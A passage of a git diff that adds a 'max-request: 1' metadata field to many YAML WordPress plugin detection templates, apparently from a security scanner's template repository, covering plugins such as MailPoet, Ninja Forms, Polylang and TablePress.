index 53d409fb68..50d2e6630b 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: mailchimp-for-woocommerce
     wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
index 0e908a9580..8d71f7bde9 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-wp/
   metadata:
+    max-request: 1
     plugin_namespace: mailchimp-for-wp
     wpscan: https://wpscan.com/plugin/mailchimp-for-wp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml
index aeb1875c57..5e1f97086e 100644
--- a/http/technologies/wordpress/plugins/mailpoet.yaml
+++ b/http/technologies/wordpress/plugins/mailpoet.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailpoet/
   metadata:
+    max-request: 1
     plugin_namespace: mailpoet
     wpscan: https://wpscan.com/plugin/mailpoet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml
index 7c15702305..d87d456a8c 100644
--- a/http/technologies/wordpress/plugins/maintenance.yaml
+++ b/http/technologies/wordpress/plugins/maintenance.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/maintenance/
   metadata:
+    max-request: 1
     plugin_namespace: maintenance
     wpscan: https://wpscan.com/plugin/maintenance
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml
index 5ce87e6c71..aa9153241e 100644
--- a/http/technologies/wordpress/plugins/mainwp-child.yaml
+++ b/http/technologies/wordpress/plugins/mainwp-child.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mainwp-child/
   metadata:
+    max-request: 1
     plugin_namespace: mainwp-child
     wpscan: https://wpscan.com/plugin/mainwp-child
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml
index c342e6b45a..09641796a3 100644
--- a/http/technologies/wordpress/plugins/malcare-security.yaml
+++ b/http/technologies/wordpress/plugins/malcare-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/malcare-security/
   metadata:
+    max-request: 1
     plugin_namespace: malcare-security
     wpscan: https://wpscan.com/plugin/malcare-security
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml
index e95041f555..28b70d09bf 100644
--- a/http/technologies/wordpress/plugins/megamenu.yaml
+++ b/http/technologies/wordpress/plugins/megamenu.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/megamenu/
   metadata:
+    max-request: 1
     plugin_namespace: megamenu
     wpscan: https://wpscan.com/plugin/megamenu
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml
index 879a0d1c12..b43c10ed7a 100644
--- a/http/technologies/wordpress/plugins/members.yaml
+++ b/http/technologies/wordpress/plugins/members.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/members/
   metadata:
+    max-request: 1
     plugin_namespace: members
     wpscan: https://wpscan.com/plugin/members
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml
index 985f5d373a..eb7e78bc7f 100644
--- a/http/technologies/wordpress/plugins/meta-box.yaml
+++ b/http/technologies/wordpress/plugins/meta-box.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/meta-box/
   metadata:
+    max-request: 1
     plugin_namespace: meta-box
     wpscan: https://wpscan.com/plugin/meta-box
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml
index bbc305b8de..3da2ea50e1 100644
--- a/http/technologies/wordpress/plugins/ml-slider.yaml
+++ b/http/technologies/wordpress/plugins/ml-slider.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ml-slider/
   metadata:
+    max-request: 1
     plugin_namespace: ml-slider
     wpscan: https://wpscan.com/plugin/ml-slider
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml
index 7e3e4e2d7e..7a58c58f63 100644
--- a/http/technologies/wordpress/plugins/newsletter.yaml
+++ b/http/technologies/wordpress/plugins/newsletter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/newsletter/
   metadata:
+    max-request: 1
     plugin_namespace: newsletter
     wpscan: https://wpscan.com/plugin/newsletter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
index 17ea142c46..5f99b8cac8 100644
--- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
+++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/nextend-facebook-connect/
   metadata:
+    max-request: 1
     plugin_namespace: nextend-facebook-connect
     wpscan: https://wpscan.com/plugin/nextend-facebook-connect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
index 953e4ab3d8..b08876df04 100644
--- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml
+++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/nextgen-gallery/
   metadata:
+    max-request: 1
     plugin_namespace: nextgen-gallery
     wpscan: https://wpscan.com/plugin/nextgen-gallery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml
index 92107fa69c..3f68dffe06 100644
--- a/http/technologies/wordpress/plugins/ninja-forms.yaml
+++ b/http/technologies/wordpress/plugins/ninja-forms.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ninja-forms/
   metadata:
+    max-request: 1
     plugin_namespace: ninja-forms
     wpscan: https://wpscan.com/plugin/ninja-forms
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml
index 5e1fe4ef5c..34f9bde1d6 100644
--- a/http/technologies/wordpress/plugins/ocean-extra.yaml
+++ b/http/technologies/wordpress/plugins/ocean-extra.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ocean-extra/
   metadata:
+    max-request: 1
     plugin_namespace: ocean-extra
     wpscan: https://wpscan.com/plugin/ocean-extra
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
index 74fb3e6010..d9f645328f 100644
--- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
+++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/official-facebook-pixel/
   metadata:
+    max-request: 1
     plugin_namespace: official-facebook-pixel
     wpscan: https://wpscan.com/plugin/official-facebook-pixel
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
index b9f70ba555..8a1196fc9f 100644
--- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml
+++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/one-click-demo-import/
   metadata:
+    max-request: 1
     plugin_namespace: one-click-demo-import
     wpscan: https://wpscan.com/plugin/one-click-demo-import
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml
index 6486c02c9a..05025452b7 100644
--- a/http/technologies/wordpress/plugins/optinmonster.yaml
+++ b/http/technologies/wordpress/plugins/optinmonster.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/optinmonster/
   metadata:
+    max-request: 1
     plugin_namespace: optinmonster
     wpscan: https://wpscan.com/plugin/optinmonster
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml
index 81f58198d3..1db1b57708 100644
--- a/http/technologies/wordpress/plugins/otter-blocks.yaml
+++ b/http/technologies/wordpress/plugins/otter-blocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/otter-blocks/
   metadata:
+    max-request: 1
     plugin_namespace: otter-blocks
     wpscan: https://wpscan.com/plugin/otter-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml
index 3743307dbc..dafe6974f6 100644
--- a/http/technologies/wordpress/plugins/password-protected.yaml
+++ b/http/technologies/wordpress/plugins/password-protected.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/password-protected/
   metadata:
+    max-request: 1
     plugin_namespace: password-protected
     wpscan: https://wpscan.com/plugin/password-protected
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml
index a4c6980041..ba05fb1e16 100644
--- a/http/technologies/wordpress/plugins/pdf-embedder.yaml
+++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pdf-embedder/
   metadata:
+    max-request: 1
     plugin_namespace: pdf-embedder
     wpscan: https://wpscan.com/plugin/pdf-embedder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
index e085f30e5a..a038adac53 100644
--- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pinterest-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: pinterest-for-woocommerce
     wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml
index adf3387ddb..7f98d822a8 100644
--- a/http/technologies/wordpress/plugins/pixelyoursite.yaml
+++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pixelyoursite/
   metadata:
+    max-request: 1
     plugin_namespace: pixelyoursite
     wpscan: https://wpscan.com/plugin/pixelyoursite
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml
index eb6e1aaa5d..89602f4264 100644
--- a/http/technologies/wordpress/plugins/polylang.yaml
+++ b/http/technologies/wordpress/plugins/polylang.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/polylang/
   metadata:
+    max-request: 1
     plugin_namespace: polylang
     wpscan: https://wpscan.com/plugin/polylang
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml
index b3c83cd0bf..2f6513ca42 100644
--- a/http/technologies/wordpress/plugins/popup-builder.yaml
+++ b/http/technologies/wordpress/plugins/popup-builder.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-builder/
   metadata:
+    max-request: 1
     plugin_namespace: popup-builder
     wpscan: https://wpscan.com/plugin/popup-builder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml
index 96d8bd6aca..982306b13c 100644
--- a/http/technologies/wordpress/plugins/popup-maker.yaml
+++ b/http/technologies/wordpress/plugins/popup-maker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-maker/
   metadata:
+    max-request: 1
     plugin_namespace: popup-maker
     wpscan: https://wpscan.com/plugin/popup-maker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml
index 85955ac95e..fdcac13b56 100644
--- a/http/technologies/wordpress/plugins/post-smtp.yaml
+++ b/http/technologies/wordpress/plugins/post-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/post-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: post-smtp
     wpscan: https://wpscan.com/plugin/post-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml
index a81fc892ca..fc316f9f7a 100644
--- a/http/technologies/wordpress/plugins/post-types-order.yaml
+++ b/http/technologies/wordpress/plugins/post-types-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/post-types-order/
   metadata:
+    max-request: 1
     plugin_namespace: post-types-order
     wpscan: https://wpscan.com/plugin/post-types-order
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
index d9c6052cd7..975b63f5de 100644
--- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
+++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/premium-addons-for-elementor/
   metadata:
+    max-request: 1
     plugin_namespace: premium-addons-for-elementor
     wpscan: https://wpscan.com/plugin/premium-addons-for-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml
index afc1141e0c..5065659e82 100644
--- a/http/technologies/wordpress/plugins/pretty-link.yaml
+++ b/http/technologies/wordpress/plugins/pretty-link.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pretty-link/
   metadata:
+    max-request: 1
     plugin_namespace: pretty-link
     wpscan: https://wpscan.com/plugin/pretty-link
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
index d44add9ca6..732ffbc4eb 100644
--- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-captcha/
   metadata:
+    max-request: 1
     plugin_namespace: really-simple-captcha
     wpscan: https://wpscan.com/plugin/really-simple-captcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
index 20ba5c2e16..12dffeb534 100644
--- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-ssl/
   metadata:
+    max-request: 1
     plugin_namespace: really-simple-ssl
     wpscan: https://wpscan.com/plugin/really-simple-ssl
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml
index cbcf3cf09d..ae0e76c4bb 100644
--- a/http/technologies/wordpress/plugins/redirection.yaml
+++ b/http/technologies/wordpress/plugins/redirection.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/redirection/
   metadata:
+    max-request: 1
     plugin_namespace: redirection
     wpscan: https://wpscan.com/plugin/redirection
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml
index 3311d42c94..b1718d1ccb 100644
--- a/http/technologies/wordpress/plugins/redux-framework.yaml
+++ b/http/technologies/wordpress/plugins/redux-framework.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/redux-framework/
   metadata:
+    max-request: 1
     plugin_namespace: redux-framework
     wpscan: https://wpscan.com/plugin/redux-framework
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
index 46c1c22805..7543ac1d55 100644
--- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/regenerate-thumbnails/
   metadata:
+    max-request: 1
     plugin_namespace: regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml
index 7c13b8d2a4..4a29cecdb0 100644
--- a/http/technologies/wordpress/plugins/safe-svg.yaml
+++ b/http/technologies/wordpress/plugins/safe-svg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/safe-svg/
   metadata:
+    max-request: 1
     plugin_namespace: safe-svg
     wpscan: https://wpscan.com/plugin/safe-svg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
index 53b30ba721..be281d91e6 100644
--- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
+++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/seo-by-rank-math/
   metadata:
+    max-request: 1
     plugin_namespace: seo-by-rank-math
     wpscan: https://wpscan.com/plugin/seo-by-rank-math
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index dc3d446af3..41baa25eb7 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-cachepress/
   metadata:
+    max-request: 1
     plugin_namespace: sg-cachepress
     wpscan: https://wpscan.com/plugin/sg-cachepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index 96b4699d2d..ee389af6ec 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-security/
   metadata:
+    max-request: 1
     plugin_namespace: sg-security
     wpscan: https://wpscan.com/plugin/sg-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
index 17584cd064..1bb9a283ce 100644
--- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
+++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/shortcodes-ultimate/
   metadata:
+    max-request: 1
     plugin_namespace: shortcodes-ultimate
     wpscan: https://wpscan.com/plugin/shortcodes-ultimate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
index 015fb97043..7836d9554c 100644
--- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
+++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/shortpixel-image-optimiser/
   metadata:
+    max-request: 1
     plugin_namespace: shortpixel-image-optimiser
     wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
index 1d5224b457..ccd72e427a 100644
--- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/simple-custom-post-order/
   metadata:
+    max-request: 1
     plugin_namespace: simple-custom-post-order
     wpscan: https://wpscan.com/plugin/simple-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml
index aafd6c6a38..3622b2c6b3 100644
--- a/http/technologies/wordpress/plugins/siteguard.yaml
+++ b/http/technologies/wordpress/plugins/siteguard.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/siteguard/
   metadata:
+    max-request: 1
     plugin_namespace: siteguard
     wpscan: https://wpscan.com/plugin/siteguard
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
index e10ab985da..9eff765d61 100644
--- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml
+++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/siteorigin-panels/
   metadata:
+    max-request: 1
     plugin_namespace: siteorigin-panels
     wpscan: https://wpscan.com/plugin/siteorigin-panels
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml
index 9881b591ae..c856e1fa9e 100644
--- a/http/technologies/wordpress/plugins/smart-slider-3.yaml
+++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/smart-slider-3/
   metadata:
+    max-request: 1
     plugin_namespace: smart-slider-3
     wpscan: https://wpscan.com/plugin/smart-slider-3
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
index 0480b4b0e6..008440cc58 100644
--- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
+++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/so-widgets-bundle/
   metadata:
+    max-request: 1
     plugin_namespace: so-widgets-bundle
     wpscan: https://wpscan.com/plugin/so-widgets-bundle
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
index 26d525386b..410776862f 100644
--- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
+++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/
   metadata:
+    max-request: 1
     plugin_namespace: stops-core-theme-and-plugin-updates
     wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
index 3920c5cf56..f210a2a2f9 100644
--- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml
+++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sucuri-scanner/
   metadata:
+    max-request: 1
     plugin_namespace: sucuri-scanner
     wpscan: https://wpscan.com/plugin/sucuri-scanner
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml
index f556786f5a..f1dd1bf150 100644
--- a/http/technologies/wordpress/plugins/svg-support.yaml
+++ b/http/technologies/wordpress/plugins/svg-support.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/svg-support/
   metadata:
+    max-request: 1
     plugin_namespace: svg-support
     wpscan: https://wpscan.com/plugin/svg-support
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
index 844e3d19a0..a9ec913599 100644
--- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
+++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/table-of-contents-plus/
   metadata:
+    max-request: 1
     plugin_namespace: table-of-contents-plus
     wpscan: https://wpscan.com/plugin/table-of-contents-plus
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml
index eb0f02f602..d38aeb0279 100644
--- a/http/technologies/wordpress/plugins/tablepress.yaml
+++ b/http/technologies/wordpress/plugins/tablepress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/tablepress/
   metadata:
+    max-request: 1
     plugin_namespace: tablepress
     wpscan: https://wpscan.com/plugin/tablepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
index 755efd53fa..07c43b9d80 100644
--- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
+++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/taxonomy-terms-order/
   metadata:
+    max-request: 1
     plugin_namespace: taxonomy-terms-order
     wpscan: https://wpscan.com/plugin/taxonomy-terms-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml
index 0403bb4e72..83a849e11e 100644
--- a/http/technologies/wordpress/plugins/the-events-calendar.yaml
+++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/the-events-calendar/
   metadata:
+    max-request: 1
     plugin_namespace: the-events-calendar
     wpscan: https://wpscan.com/plugin/the-events-calendar
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml
index cd2632ea05..c6100637d9 100644
--- a/http/technologies/wordpress/plugins/themeisle-companion.yaml
+++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/themeisle-companion/
   metadata:
+    max-request: 1
     plugin_namespace: themeisle-companion
     wpscan: https://wpscan.com/plugin/themeisle-companion
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
index b5f8b822c7..1f188b66c6 100644
--- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml
+++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/tinymce-advanced/
